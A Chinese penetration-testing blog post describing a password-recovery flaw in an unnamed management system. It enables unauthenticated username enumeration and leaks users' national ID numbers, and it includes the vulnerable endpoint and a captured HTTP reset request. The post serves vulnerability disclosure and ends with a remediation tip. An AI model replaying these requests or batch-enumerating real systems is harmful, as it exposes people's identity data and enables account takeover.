点击蓝字 · 关注我们
某信息管理系统密码找回处用户名枚举+敏感信息泄露
信息泄露
高危
https://xxxxx/xxxxx/framework/ums/login.xhtml
0x01
某信息管理系统后台忘记密码功能处:
https://xxxx.xxx/xxxxx/framework/ums/login.xhtml
点击忘记密码功能,进行密码找回:
0x02
输入账户和验证码,用burp抓包:
https://xxx.xxx.xx.xx/xxxx/nextStep.do?do=checkUserInfo&id=test
这里这个接口,可直接根据返回已注册用户的用户名和身份证号,userid等敏感信息。
POST /x/nexxxxtStep.do?do=goStep4 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: close
Content-Length: 30
Accept: */*
Origin: https://xxx.x.xxxxx.xxx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://xxx.xxx.xxx.xxx/xxx/xxx/faceresetpwd/reset-password3.xhtml?code=admin
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID2=jd580_R6RI8TGaoj7sIzGU8v069tYVhn1gfgerRX1eFhAfSaJaNB!1386395699; openstack_cookie_insert=42066108
psw=Y2VzaGkxMjM%3D&userId=test
批量枚举获取:
这里存在一个问题,就是用户如果写入身份证号则会直接返回,不写的话则没有。
不用登录直接可以枚举已注册的用户名,并且直接返回已注册用户的身份证等敏感信息。
对敏感信息做好脱敏处理,并且对接口返回的信息做统一处理。
PS:本文仅用于技术讨论与分析,严禁用于任何非法用途,违者后果自负。
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号